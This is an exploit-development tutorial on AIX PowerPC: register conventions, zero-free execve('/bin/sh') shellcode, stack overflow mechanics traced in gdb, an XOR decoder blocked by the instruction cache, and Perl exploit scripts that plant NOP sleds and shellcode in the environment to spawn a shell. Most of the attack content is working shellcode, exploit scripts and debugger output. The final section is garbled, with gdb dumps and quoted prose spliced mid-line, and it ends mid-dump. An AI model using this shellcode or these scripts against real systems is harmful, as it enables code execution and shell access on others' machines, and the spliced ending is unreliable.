Author: san (san_at_xfocus.org)
--[ 1 - Familiar with PowerPC architecture(32 bit)
The PowerPC architecture is a Reduced Instruction Set Computer (RISC) architecture, with over two hundred defined instructions. PowerPC is RISC in that most instructions execute in a single cycle and typically perform a single operation (such as loading storage to a register, or storing a register to memory). PowerPC instructions are of uniform length of 32 bits and there are almost 12 instruction formats, which reflect 5 primary classes of instructions:
- branch instructions,
- fixed-point instructions,
- floating-point instructions,
- load and store instructions,
- processor control instructions.
PowerPC's application-level registers are broken into three classes: general-purpose registers (GPRs), floating-point registers (FPRs and Floating-Point Status and Control Register [FPSCR]), and special-purpose registers (SPRs). We can see 38 registers in gdb with "info registers" command. Following, Let's look at each class.
r0 Volatile register used in function prologs
r1 Stack frame pointer
r2 TOC pointer
r3 Volatile parameter and return value register
r4-r10 Volatile registers used for function parameters
r11 Volatile register used in calls by pointer and as an
environment pointer for languages which require one
r12 Volatile register used for exception handling and glink code
r13 Reserved for use as system thread ID
r14-r31 Nonvolatile registers used for local variables
Floating-point registers (FPRs)
f0 Volatile scratch register
f1-f4 Volatile floating point parameter and return value registers
f5-f13 Volatile floating point parameter registers
f14-f31 Nonvolatile registers
Special-purpose registers (SPRs)
LR Link register (volatile)
CTR Loop counter register (volatile)
XER Fixed point exception register (volatile)
FPSCR Floating point status and control register (volatile)
CR0-CR1 Volatile condition code register fields
CR2-CR4 Nonvolatile condition code register fields
CR5-CR7 Volatile condition code register fields
Registers r1, r14 through r31, and f14 through f31 are nonvolatile, which means that they preserve their values across function calls. Functions which use those registers must save the value before changing it, restoring it before the function returns. Register r2 is technically nonvolatile, but it is handled specially during function calls as described below: in some cases the calling function must restore its value after a function call.
Registers r0, r3 through r12, f0 through f13, and the special purpose registers LR, CTR, XER, and FPSCR are volatile, which means that they are not preserved across function calls. Furthermore, registers r0, r2, r11, and r12 may be modified by cross-module calls, so a function can not assume that the values of one of these registers is that placed there by the calling function.
The condition code register fields CR0, CR1, CR5, CR6, and CR7 are volatile. The condition code register fields CR2, CR3, and CR4 are nonvolatile; a function which modifies them must save and restore at least those fields of the CR. Languages that require "environment pointers" shall use r11 for that purpose.
On AIX the svca (sc in a mnemonic notation of PowerPC) instruction is used whenever the operating system services are to be called. The r2 register denotes the system call number and registers r3-r10 are appropriately filled with a given system call arguments. There are two additional prerequisites that must be fulfilled before executing the system call instruction: the LR register must be filled with the return from syscall address value and the crorc cr6, cr6, cr6 instruction must be issued just before the system call.
--[ 2 - Learn AIX PowerPC assemble format
Use gcc -S to compile C program can obtain AIX assembly code. If you are not familiar with AIX PowerPC assemble format, just write a small program in C language.
/* setuid.c * * Learn AIX PowerPC assembly */ #includeint main() { setuid(0); }
Then compile it use gcc with -S option:
-bash-2.05b$ gcc -S setuid.c
Open setuid.s on current directory:
.file "setuid.c" .toc .csect .text[PR] .align 2 .globl main .globl .main .csect main[DS] main: .long .main, TOC[tc0], 0 .csect .text[PR] .main: .extern __mulh .extern __mull .extern __divss .extern __divus .extern __quoss .extern __quous mflr 0 stw 31,-4(1) stw 0,8(1) stwu 1,-72(1) mr 31,1 li 3,0 bl .setuid nop mr 3,0 lwz 1,0(1) lwz 0,8(1) mtlr 0 lwz 31,-4(1) blr LT..main: .long 0 .byte 0,0,32,97,128,1,0,1 .long LT..main-.main .short 4 .byte "main" .byte 31 .align 2 _section_.text: .csect .data[RW],3 .long _section_.text
To reduce to fundamental parts, the following is enough:
.globl .main .csect .text[PR] .main: mflr 0 stw 31,-4(1) stw 0,8(1) stwu 1,-72(1) mr 31,1 li 3,0 bl .setuid nop mr 3,0 lwz 1,0(1) lwz 0,8(1) mtlr 0 lwz 31,-4(1) blr
--[ 3 - Learn shellcode of AIX PowerPC
B-r00t's PowerPC/OS X (Darwin) Shellcode Assembly is good stuff, although it is OS X but both are PowerPC architecture. We can write shellcode like B-r00t:
-bash-2.05b$ cat simple_execve.s .globl .main .csect .text[PR] .main: xor. %r5, %r5, %r5 # r5 = NULL bnel .main # branch to _main if not equal mflr %r3 # r3 = main + 8 addi %r3, %r3, 32 # r3 = main + 8 + 32 = string stw %r3, -8(%r1) # argv[0] = string stw %r5, -4(%r1) # argv[1] = NULL subi %r4, %r1, 8 # r4 = pointer to argv[] li %r2, 5 # syscall number = execve crorc %cr6, %cr6, %cr6 # There are two additional prerequisites that must be fulfilled before executing the system call instruction: the LR register must be filled with the return from syscall address value and the crorc cr6, cr6, cr6 instruction must be issued just before the system call. svca 0 # execve(r3, r4, r5) string: # execve(path, argv[], NULL) .asciz "/bin/sh" -bash-2.05b$ gcc -o simple_execve simple_execve.s -bash-2.05b$ ./simple_execve $
The execve syscall executed correct, and then use objdump check the opcode:
-bash-2.05b$ objdump -d simple_execve|more ... 0000000010000544 <.main>: 10000544: 7c a5 2a 79 xor. r5,r5,r5 10000548: 40 82 ff fd bnel 10000544 <.main> 1000054c: 7c 68 02 a6 mflr r3 10000550: 38 63 00 20 cal r3,32(r3) 10000554: 90 61 ff f8 st r3,-8(r1) 10000558: 90 a1 ff fc st r5,-4(r1) 1000055c: 38 81 ff f8 cal r4,-8(r1) 10000560: 38 40 00 05 lil r2,5 10000564: 4c c6 33 42 crorc 6,6,6 10000568: 44 00 00 02 svca 0 1000056c: 2f 62 69 6e cmpi 6,r2,26990 10000570: 2f 73 68 00 cmpi 6,r19,26624 ...
There are some opcodes contain zero. These bytes must be eliminated for the shellcode to suit strcpy etc. Some instructions have reservered bytes, so we can replace it. The opcode of svca is 0x44000002. However, bytes 2 and 3 of the opcode are reserved and therefore not used. So it can be instead of 0x44ffff02. LSD provided a simple shellcode:
/* shellcode.c * * ripped from lsd */ char shellcode[] = /* 12*4+8 bytes */ "\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */ "\x40\x82\xff\xfd" /* bnel*/ "\x7f\xe8\x02\xa6" /* mflr r31 */ "\x3b\xff\x01\x20" /* cal r31,0x120(r31) */ "\x38\x7f\xff\x08" /* cal r3,-248(r31) */ "\x38\x9f\xff\x10" /* cal r4,-240(r31) */ "\x90\x7f\xff\x10" /* st r3,-240(r31) */ "\x90\xbf\xff\x14" /* st r5,-236(r31) */ "\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */ "\x98\xbf\xff\x0f" /* stb r5,-241(r31) */ "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02" /* svca */ "/bin/sh" "\x05" ; int main(void) { int jump[2]={(int)shellcode,0}; ((*(void (*)())jump)()); }
After compiled this program, use IDAPro to open and disassemble it. In IDAPro window, click shellcode at Names window and press c to disassemble the shellcode data:
.data:200006D8 shellcode: # CODE XREF: .data:200006DC p .data:200006D8 # DATA XREF: .data:shellcode_TC o .data:200006D8 7C A5 2A 79 xor. r5, r5, r5 # r5 = NULL .data:200006DC 40 82 FF FD bnel shellcode # branch to shellcode if not equal .data:200006E0 7F E8 02 A6 mflr r31 # r31 = .data:200006D8 + 8 .data:200006E4 3B FF 01 20 addi r31, r31, 0x120 # r31 = .data:200006D8 + 8 + 0x120 .data:200006E8 38 7F FF 08 subi r3, r31, 0xF8 # r3 = .data:200006D8 + 8 + 0x120 - 0xF8 = .data:20000708 = string .data:200006EC 38 9F FF 10 subi r4, r31, 0xF0 # r4 = .data:20000710 .data:200006F0 90 7F FF 10 stw r3, -0xF0(r31) # put address .data:20000708 to .data:20000710 .data:200006F4 90 BF FF 14 stw r5, -0xEC(r31) # put 0 to .data:20000714 .data:200006F8 88 5F FF 0F lbz rtoc, -0xF1(r31)# load syscall number to r2 .data:200006FC 98 BF FF 0F stb r5, -0xF1(r31) # put 0 to .data:2000070F .data:20000700 4C C6 33 42 crorc 4*cr1+eq, 4*cr1+eq, 4*cr1+eq # Condition Register OR with Comlement .data:20000700 # ------------------------------------------------------------------------ .data:20000704 44 .byte 0x44 # modified svca .data:20000705 FF .byte 0xFF .data:20000706 FF .byte 0xFF .data:20000707 02 .byte 2 .data:20000708 2F .byte 0x2F # / .data:20000709 62 .byte 0x62 # b .data:2000070A 69 .byte 0x69 # i .data:2000070B 6E .byte 0x6E # n .data:2000070C 2F .byte 0x2F # / .data:2000070D 73 .byte 0x73 # s .data:2000070E 68 .byte 0x68 # h .data:2000070F 05 .byte 5
IDAPro is more powerful and it's disassembly is more understandability. OK, we know how to write and debug shellcode now.
--[ 4 - Learn overflow technology of AIX PowerPC
There are differences of stack structure between PowerPC and ia32. The PowerPC stack conventions use only a stack pointer (held in register GPR1) and no frame pointer. This configuration assumes a fixed stack frame size, which is known at compile time. Parameters are not passed by pushing them onto the stack. The following is the PowerPC stack:
. Stack before . . Stack after . . calling a . . calling a . | procedure | | procedure | +----------------+- +----------------+- | Parameter area | | | Parameter area | | +----------------+ +-Caller +----------------+ +-Caller | Linkage area | | | Linkage area | | SP --->+----------------+- +----------------+- | Stack grows | | Saved registers| | . down . +----------------+ | . | . | Local variables| | v +----------------+ +-Callee | Parameter area | | +----------------+ | | Linkage area | | SP --->+----------------+- | Stack grows | . down . . | . v
The PowerPC runtime environment uses a grow-down stack that contains linkage information, local variables, and a routine's parameter information.
The calling routine's linkage area holds a number of values, some of which are saved by the calling routine and some by the called routine. It's structure as following:
+24+----------------+ | Saved TOC | +20+----------------+ | Reserved | +16+----------------+ | Reserved | +12+----------------+ | Saved LR | +8+----------------+ | Saved CR | +4+----------------+ | Saved SP | SP --->+----------------+
The Link Register (LR) value is saved at 8(SP) by the called routine if it chooses to do so.
The Condition Register (CR) value may be saved at 4(SP) by the called routine. As with the Link Register value, the called routine is not required to save this value.
The stack pointer is always saved by the calling routine as part of its stack frame.
The parameter area has space for the parameters of any routines the caller calls (not the parameters of the caller itself). Since the calling routine might call several different routines, the parameter area must be large enough to accommodate the largest parameter list of all the routines the caller calls. It is the calling routine's responsibility for setting up the parameter area before each call to some other routine, and the called routine's responsibility for accessing the parameters placed within it.
There are three instructions when function return on ia32:
mov esp,ebp ; esp point to prior frame pop ebp ret ; execute address that saved at esp+4
There are some instructions when function return on AIX PowerPC:
lwz r1,0(r1) # r1 point to prior frame lwz r0,8(r1) # load saved lr to r0 mtlr r0 # lr=r0 lwz r31,-4(r1) # blr # execute address that saved at lr
Although there are differences of stack structure between PowerPC and ia32, but they have the same overflow technology. We need overwrite ebp+4 of current frame to return our control address on ia32, and we need overwrite r1+8 of prior frame to return our control address on AIX PowerPC.
Running the simple_overflow program in GDB shows that the control of the saved return address (previous LR value) is possible.
-bash-2.05b$ cat simple_overflow.c /* simple_overflow.c * * Simple program to demonstrate buffer overflows * on the PowerPC architecture. */ #include#include char largebuff[] = "123451234512345123451234=PRESERVEDSPACE=ABCD"; int main (void) { char smallbuff[16]; strcpy (smallbuff, largebuff); } -bash-2.05b$ gcc -o simple_overflow simple_overflow.c -bash-2.05b$ gdb -q simple_overflow (gdb) r Starting program: /home/san/simple_overflow Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? () (gdb) i reg r0 0x41424344 1094861636 r1 0x2ff22bb0 804400048 r2 0x20000e70 536874608 r3 0x20 32 r4 0x20000534 536872244 r5 0x2ff22bbc 804400060 r6 0x0 0 r7 0x0 0 r8 0x0 0 r9 0x80808080 -2139062144 r10 0x7f7f7f7f 2139062143 r11 0x4 4 r12 0x80808080 -2139062144 r13 0xdeadbeef -559038737 r14 0x1 1 r15 0x2ff22c00 804400128 r16 0x2ff22c08 804400136 r17 0x0 0 r18 0xdeadbeef -559038737 r19 0xdeadbeef -559038737 r20 0xdeadbeef -559038737 r21 0xdeadbeef -559038737 r22 0xdeadbeef -559038737 r23 0xdeadbeef -559038737 r24 0xdeadbeef -559038737 r25 0xdeadbeef -559038737 r26 0xdeadbeef -559038737 r27 0xdeadbeef -559038737 r28 0x20000460 536872032 r29 0x10000000 268435456 r30 0x3 3 r31 0x53455256 1397051990 pc 0x41424344 1094861636 ps 0x4000d032 1073795122 cr 0x22222842 572663874 lr 0x41424344 1094861636 ctr 0x4 4 xer 0x0 0 fpscr 0x0 0 vscr 0x0 0 vrsave 0x0 0 (gdb) x/8x $r1 0x2ff22bb0: 0x45445350 0x4143453d 0x41424344 0x00000000 0x2ff22bc0: 0x00000000 0x20000e70 0x00000000 0x00000000
Register pc has been overwritten to ABCD and this is our controled content.
(gdb) disas main Dump of assembler code for function main: 0x1000054c: mflr r0 0x10000550 : stw r31,-4(r1) 0x10000554 : stw r0,8(r1) 0x10000558 : stwu r1,-88(r1) 0x1000055c : mr r31,r1 0x10000560 : addi r3,r31,56 0x10000564 : lwz r4,80(r2) 0x10000568 : bl 0x10006fa0 0x1000056c : nop 0x10000570 : mr r3,r0 0x10000574 : lwz r1,0(r1) 0x10000578 : lwz r0,8(r1) 0x1000057c : mtlr r0 0x10000580 : lwz r31,-4(r1) 0x10000584 : blr 0x10000588 : .long 0x0 0x1000058c : .long 0x2061 0x10000590 : lwz r0,1(r1) 0x10000594 : .long 0x3c 0x10000598 : .long 0x46d61 0x1000059c : xori r14,r11,7936 End of assembler dump. (gdb) b main Breakpoint 1 at 0x10000560 (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/san/simple_overflow Breakpoint 1, 0x10000560 in main () (gdb) display/i $pc 1: x/i $pc 0x10000560 : addi r3,r31,56 (gdb) x/20x $r1 0x2ff22b58: 0x2ff22bb0 0x00000000 0x00000000 0x00000000 0x2ff22b68: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22b78: 0x00000000 0x00000000 0x00000000 0x00000001 0x2ff22b88: 0x00000000 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x2ff22b98: 0xdeadbeef 0xdeadbeef 0x20000460 0x10000000 (gdb) 0x2ff22ba8: 0x00000003 0x20000460 0x00000000 0x44222802 0x2ff22bb8: 0x100001cc 0x00000000 0x00000000 0x20000e70 0x2ff22bc8: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22bd8: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22be8: 0x00000000 0x00000000 0x00000000 0x00000000
0x2ff22b58 is the current sp, and it contains prior stack frame address(0x2ff22bb0). So we can get the lr value that saved in prior stack frame, and it is 0x100001cc. The program will execute this address after main function return.
(gdb) until *0x1000056c 0x1000056c in main () 1: x/i $pc 0x1000056c: nop (gdb) i reg r0 0x20 32 r1 0x2ff22b58 804399960 r2 0x20000e70 536874608 r3 0x2ff22b90 804400016 r4 0x20000534 536872244 r5 0x2ff22bbc 804400060 r6 0x0 0 r7 0x0 0 r8 0x0 0 r9 0x80808080 -2139062144 r10 0x7f7f7f7f 2139062143 r11 0x4 4 r12 0x80808080 -2139062144 r13 0xdeadbeef -559038737 r14 0x1 1 r15 0x2ff22c00 804400128 r16 0x2ff22c08 804400136 r17 0x0 0 r18 0xdeadbeef -559038737 r19 0xdeadbeef -559038737 r20 0xdeadbeef -559038737 r21 0xdeadbeef -559038737 r22 0xdeadbeef -559038737 r23 0xdeadbeef -559038737 r24 0xdeadbeef -559038737 r25 0xdeadbeef -559038737 r26 0xdeadbeef -559038737 r27 0xdeadbeef -559038737 r28 0x20000460 536872032 r29 0x10000000 268435456 r30 0x3 3 r31 0x2ff22b58 804399960 pc 0x1000056c 268436844 ps 0x2d032 184370 cr 0x22222842 572663874 lr 0x1000056c 268436844 ctr 0x4 4 xer 0x0 0 fpscr 0x0 0 vscr 0x0 0 vrsave 0x0 0 (gdb) x/20x $r1 0x2ff22b58: 0x2ff22bb0 0x00000000 0x00000000 0x00000000 0x2ff22b68: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22b78: 0x00000000 0x00000000 0x00000000 0x00000001 0x2ff22b88: 0x00000000 0xdeadbeef 0x31323334 0x35313233 0x2ff22b98: 0x34353132 0x33343531 0x32333435 0x31323334 (gdb) 0x2ff22ba8: 0x3d505245 0x53455256 0x45445350 0x4143453d 0x2ff22bb8: 0x41424344 0x00000000 0x00000000 0x20000e70 0x2ff22bc8: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22bd8: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22be8: 0x00000000 0x00000000 0x00000000 0x00000000
After strcpy, the lr value that saved in prior stack frame was overwritten to 0x41424344.
(gdb) ni 0x10000570 in main () 1: x/i $pc 0x10000570: mr r3,r0 (gdb) 0x10000574 in main () 1: x/i $pc 0x10000574 : lwz r1,0(r1) (gdb) 0x10000578 in main () 1: x/i $pc 0x10000578 : lwz r0,8(r1) (gdb) 0x1000057c in main () 1: x/i $pc 0x1000057c : mtlr r0 (gdb) 0x10000580 in main () 1: x/i $pc 0x10000580 : lwz r31,-4(r1) (gdb) 0x10000584 in main () 1: x/i $pc 0x10000584 : blr (gdb)
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
1: x/i $pc 0x41424344: Cannot access memory at address 0x41424344
Disabling display 1 to avoid infinite recursion.
These instructions has been introduced before. The program will execute the lr value that saved in prior stack frame at r1+8.
--[ 5 - How to attack overflow vulnerability on AIX PowerPC
Now we know overflow process, then let's try to attack overflow vulnerability. The following program is the vulnerability.
-bash-2.05b$ cat vulnerable.c /* vulnerable.c * * Vulnerable program on the PowerPC architecture. */ #include#include int main (int argc, char *argv[]) { char vulnbuff[16]; strcpy (vulnbuff, argv[1]); printf ("\n%s\n", vulnbuff); getchar(); /* for debug */ } -bash-2.05b$ gcc -o vulnerable vulnerable.c
0x2ff22fff seems to be stack bottom of AIX. The following is the AIX's stack structure:
Stack bottom +----------------+ 0x2ff22fff | Reserverd | +----------------+ | Enviroment | +----------------+ | args | +----------------+ | path | +----------------+ | Stack frames | SP --->+----------------+ | Stack grows | . down . . | . . v .
Enviroment address can be guessed more exactly, so we put lots of nop instructions and the shellcode into the enviroment.
-bash-2.05b$ cat exploit.pl #!/usr/bin/perl # # exploit.pl # exploit program vulnerable $CMD="/home/san/vulnerable"; $SHELLCODE= "\x7c\xa5\x2a\x79". # /* xor. r5,r5,r5 */ "\x40\x82\xff\xfd". # /* bnel*/ "\x7f\xe8\x02\xa6". # /* mflr r31 */ "\x3b\xff\x01\x20". # /* cal r31,0x120(r31) */ "\x38\x7f\xff\x08". # /* cal r3,-248(r31) */ "\x38\x9f\xff\x10". # /* cal r4,-240(r31) */ "\x90\x7f\xff\x10". # /* st r3,-240(r31) */ "\x90\xbf\xff\x14". # /* st r5,-236(r31) */ "\x88\x5f\xff\x0f". # /* lbz r2,-241(r31) */ "\x98\xbf\xff\x0f". # /* stb r5,-241(r31) */ "\x4c\xc6\x33\x42". # /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02". # /* svca */ "/bin/sh". "\x05"; $NOP="\x60\x60\x60\x60"x800; %ENV=(); $ENV{CCC}=$NOP.$SHELLCODE; $ret=system $CMD ,"\x2f\xf2\x2b\x40"x11;
Try it.
-bash-2.05b$ ./exploit.pl /?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@
Use gdb debug the vulnerable program on the another tty:
-bash-2.05b$ ps aux|grep vul san 47644 0.0 0.0 208 220 pts/1 A 22:16:24 0:00 grep vul san 44544 0.0 0.0 96 304 pts/0 A 22:16:02 0:00 /home/san/vulnera -bash-2.05b$ gdb vulnerable 44544 GNU gdb 6.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "powerpc-ibm-aix5.1.0.0"... Attaching to program: /home/san/vulnerable, process 44544 0xd01ea254 in read () from /usr/lib/libc.a(shr.o) (gdb) disas main Dump of assembler code for function main: 0x10000544: mflr r0 0x10000548 : stw r31,-4(r1) 0x1000054c : stw r0,8(r1) 0x10000550 : stwu r1,-88(r1) 0x10000554 : mr r31,r1 0x10000558 : stw r3,112(r31) 0x1000055c : stw r4,116(r31) 0x10000560 : lwz r9,116(r31) 0x10000564 : addi r9,r9,4 0x10000568 : addi r3,r31,56 0x1000056c : lwz r4,0(r9) 0x10000570 : bl 0x10007000 0x10000574 : nop 0x10000578 : lwz r3,88(r2) 0x1000057c : addi r4,r31,56 0x10000580 : bl 0x100073ec 0x10000584 : lwz r2,20(r1) 0x10000588 : lwz r11,92(r2) 0x1000058c : lwz r9,92(r2) 0x10000590 : lwz r9,4(r9) 0x10000594 : addi r0,r9,-1 0x10000598 : stw r0,4(r11) 0x1000059c : cmpwi r0,0 0x100005a0 : bge- 0x100005b4 0x100005a4 : lwz r3,92(r2) 0x100005a8 : bl 0x1000747c <__filbuf> 0x100005ac : lwz r2,20(r1) 0x100005b0 : b 0x100005c8 0x100005b4 : lwz r11,92(r2) 0x100005b8 : lwz r9,92(r2) 0x100005bc : lwz r9,0(r9) 0x100005c0 : addi r0,r9,1 0x100005c4 : stw r0,0(r11) 0x100005c8 : mr r3,r0 0x100005cc : lwz r1,0(r1) 0x100005d0 : lwz r0,8(r1) 0x100005d4 : mtlr r0 0x100005d8 : lwz r31,-4(r1) 0x100005dc : blr 0x100005e0 : .long 0x0 0x100005e4 : .long 0x2061 0x100005e8 : lwz r0,513(r1) ---Type to continue, or q to quit--- 0x100005ec : .long 0x0 0x100005f0 : .long 0x9c 0x100005f4 : .long 0x46d61 0x100005f8 : xori r14,r11,7936 End of assembler dump. (gdb) b *0x100005dc Breakpoint 1 at 0x100005dc (gdb) c Continuing.
Press any key at the tty which running exploit.pl, and the gdb debug window continues:
Breakpoint 1, 0x100005dc in main () (gdb) i reg r0 0x100001cc 268435916 r1 0x2ff22210 804397584 r2 0x20000ee8 536874728 r3 0xf00890f1 -267874063 r4 0xf00890f0 -267874064 r5 0x0 0 r6 0xd032 53298 r7 0x0 0 r8 0x60000000 1610612736 r9 0x60002449 1610622025 r10 0x0 0 r11 0x600026c8 1610622664 r12 0x100005ac 268436908 r13 0xdeadbeef -559038737 r14 0x2 2 r15 0x2ff22264 804397668 r16 0x2ff22270 804397680 r17 0x0 0 r18 0xdeadbeef -559038737 r19 0xdeadbeef -559038737 r20 0xdeadbeef -559038737 r21 0xdeadbeef -559038737 r22 0xdeadbeef -559038737 r23 0xdeadbeef -559038737 r24 0xdeadbeef -559038737 r25 0xdeadbeef -559038737 r26 0xdeadbeef -559038737 r27 0xdeadbeef -559038737 r28 0x20000520 536872224 r29 0x10000000 268435456 r30 0x3 3 r31 0x2ff22b40 804399936 pc 0x100005dc 268436956 ps 0x2d032 184370 cnd 0x24222422 606217250 lr 0x100001cc 268435916 cnt 0x0 0 xer 0x0 0 mq 0x0 0 fpscr 0x0 0 (gdb) x/20x $r1 (gdb) x/20x $r1 0x2ff22210: 0x2ff22b40 0x2ff22b40 0x2ff22b40 0x00000000 0x2ff22220: 0x00000000 0x20000ee8 0x00000002 0x2ff2225c 0x2ff22230: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22240: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22250: 0x00000000 0x00000000 0x00000000 0x2ff22270 (gdb) x/20x 0x2ff22b40 0x2ff22b40: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22b50: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22b60: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22b70: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22b80: 0x60606060 0x60606060 0x60606060 0x60606060 ... ... ... (gdb) 0x2ff22f00: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22f10: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22f20: 0x60606060 0x60606060 0x60606060 0x60606060 0x2ff22f30: 0x60606060 0x60607ca5 0x2a794082 0xfffd7fe8 0x2ff22f40: 0x02a63bff 0x0120387f 0xff08389f 0xff10907f
The lr register has been overwritten to 0x2ff22b40. Program will execute this address after function returning, and there are lots of nop instructions after this address until the shellcode appeared. But we must be notice the align problem. The following exploit avoid this problem:
#!/usr/bin/perl # # exploit1.pl # exploit program vulnerable $CMD="/home/san/vulnerable"; $SHELLCODE= "\x7c\xa5\x2a\x79". # /* xor. r5,r5,r5 */ "\x40\x82\xff\xfd". # /* bnelIt seems good!*/ "\x7f\xe8\x02\xa6". # /* mflr r31 */ "\x3b\xff\x01\x20". # /* cal r31,0x120(r31) */ "\x38\x7f\xff\x08". # /* cal r3,-248(r31) */ "\x38\x9f\xff\x10". # /* cal r4,-240(r31) */ "\x90\x7f\xff\x10". # /* st r3,-240(r31) */ "\x90\xbf\xff\x14". # /* st r5,-236(r31) */ "\x88\x5f\xff\x0f". # /* lbz r2,-241(r31) */ "\x98\xbf\xff\x0f". # /* stb r5,-241(r31) */ "\x4c\xc6\x33\x42". # /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02". # /* svca */ "/bin/sh". "\x05"; $NOP="\x60\x60\x60\x60"x800; %ENV=(); $ENV{CCC}=$NOP.$SHELLCODE; $ret=system $CMD ,"\x2f\xf2\x2b\x40"x11; for($i=0;$i<4 && $ret;$i++){ for($j=0;$j<4 && $ret;$j++) { $ENV{CCC}="A"x $j .$NOP.$SHELLCODE; $ret = system $CMD ,"A"x $i ."\x2f\xf2\x2b\x40"x11; } } -bash-2.05b$ ./exploit1.pl /?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@ /?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@ /?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@ /?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@/?+@ $
--[ 6 - Bypass I-cache Decoder shellcode is very simple in ia32 architechture.
Although PowerPC instructions cann't access memory direct except load and store instructions, but we can write a decoder shellcode as ia32.
char shellcode[] = // decoder "\x7c\xa5\x2a\x79" // xor. %r5, %r5, %r5 "\x40\x82\xff\xfd" // bnel .main "\x7c\x68\x02\xa6" // mflr %r3 "\x38\x63\x01\x01" // addi %r3, %r3, 0x101 "\x38\x63\xff\x26" // addi %r3, %r3, -0xDA # r3 point start of real shellcode-1 "\x39\x20\x01\x01" // li %r9, 0x101 "\x39\x29\xff\x23" // addi %r9, %r9, -0xDD # shellcode size+1 "\x7c\xc9\x18\xae" // lbzx %r6, %r9, %r3 # read a character "\x68\xc7\xfe\xfe" // xori %r7, %r6, 0xFEFE # xor "\x7c\xe9\x19\xae" // stbx %r7, %r9, %r3 # store a character "\x35\x29\xff\xff" // subic. %r9, %r9, 1 "\x40\x82\xff\xf0" // bne Loop # loop // real shellcode "\xc6\x9d\xfe\xe3" // addi %r3, %r3, 29 "\x6e\x9f\x01\x06" // stw %r3, -8(%r1) "\x6e\x5f\x01\x02" // stw %r5, -4(%r1) "\xc6\x7f\x01\x06" // subi %r4, %r1, 8 "\xc6\xbe\xfe\xfb" // li %r2, 5 "\xb2\x38\xcd\xbc" // crorc %cr6, %cr6, %cr6 "\xba\xfe\xfe\xfc" // svca 0 "\xd1\x9c\x97\x90" // .byte '/', 'b', 'i', 'n', "\xd1\x8d\x96\xfe" // '/', 's', 'h', 0x0 ; int main() { int jump[2]={(int)shellcode,0}; ((*(void (*)())jump)()); }The first part is decoder. r3 points to the address of the front of real shellcode. r9 is the counter, whose size is one more than real shellcode. It will do xor operate from last byte of real shellcode. When I run the program in gdb, I find the following problem:
(gdb) r Starting program: /home/san/test Program received signal SIGSEGV, Segmentation fault. 0x20000418 in shellcode () (gdb) x/8i $pc 0x20000418The program halts at 0x20000418, and the instruction is "addi r3,r3,29". This instruction has no problem, and all of real shellcode seems decoded correctly, but the shellcode failed. When I break at 0x20000418, it is in different way after run:: addi r3,r3,29 0x2000041c : stw r3,-8(r1) 0x20000420 : stw r5,-4(r1) 0x20000424 : addi r4,r1,-8 0x20000428 : li r2,5 0x2000042c : crorc 4*cr1+eq,4*cr1+eq,4*cr1+eq 0x20000430 : sc 0x20000434 : cmpdi cr6,r2,26990 (gdb) x/24x $pc-48 0x200003e8 : 0x7ca52a79 0x4082fffd 0x7c6802a6 0x38630101 0x200003f8 : 0x3863ff26 0x39200101 0x3929ff23 0x7cc918ae 0x20000408 : 0x68c7fefe 0x7ce919ae 0x3529ffff 0x4082fff0 0x20000418 : 0x3863001d 0x9061fff8 0x90a1fffc 0x3881fff8 0x20000428 : 0x38400005 0x4cc63342 0x44000002 0x2f62696e 0x20000438 : 0x2f736800 0x00000000 0x100005a0 0x00000000 (gdb)
(gdb) b *0x20000418 Breakpoint 1 at 0x20000418 (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/san/test Breakpoint 1, 0x20000418 in shellcode () (gdb) x/8i $pc 0x20000418I found that the content of address 0x20000418 wasn't decoded. It was strange! I discussed it with watercloud and alert7, and they said it might be instruction cache or branch prediction. We found a discussion by google: AIX has instruction cache and data cache. When execution begins, the instructions are fetched from the instruction cache -- which isn't always the same as what you put into the data cache. So, a normal xor decoder won't work. "A developer's guide to the PowerPC architecture" introduced self-modifying code. While writing self-modifying code is not a recommended practice, sometimes it is absolutely necessary. The following sequence shows the instructions used to perform a code modification: 1. Store the modified instruction. 2. Issue the dcbst instruction to force the cache line containing the modified instruction to storage. 3. Issue the sync instruction to ensure dcbst is completed. 4. Issue the icbi instruction to invalidate the instruction cache line that will contain the modified instruction. 5. Issue the isync instruction to clear the instruction pipeline of any instruction that may have already been fetched from the cache line prior to the cache line being invalidated. 6. It is now okay to execute the modified instruction. An instruction cache miss will occur when fetching this instruction, resulting in the fetching of the modified instruction from storage. H D Moore send me a sample on MacOSX, but these is a big problem on my box. OK, my AIX box like below:: lfsu f20,-285(r29) 0x2000041c : stw r3,-8(r1) 0x20000420 : stw r5,-4(r1) 0x20000424 : addi r4,r1,-8 0x20000428 : li r2,5 0x2000042c : crorc 4*cr1+eq,4*cr1+eq,4*cr1+eq 0x20000430 : sc 0x20000434 : cmpdi cr6,r2,26990 (gdb) x/24x $pc-48 0x200003e8 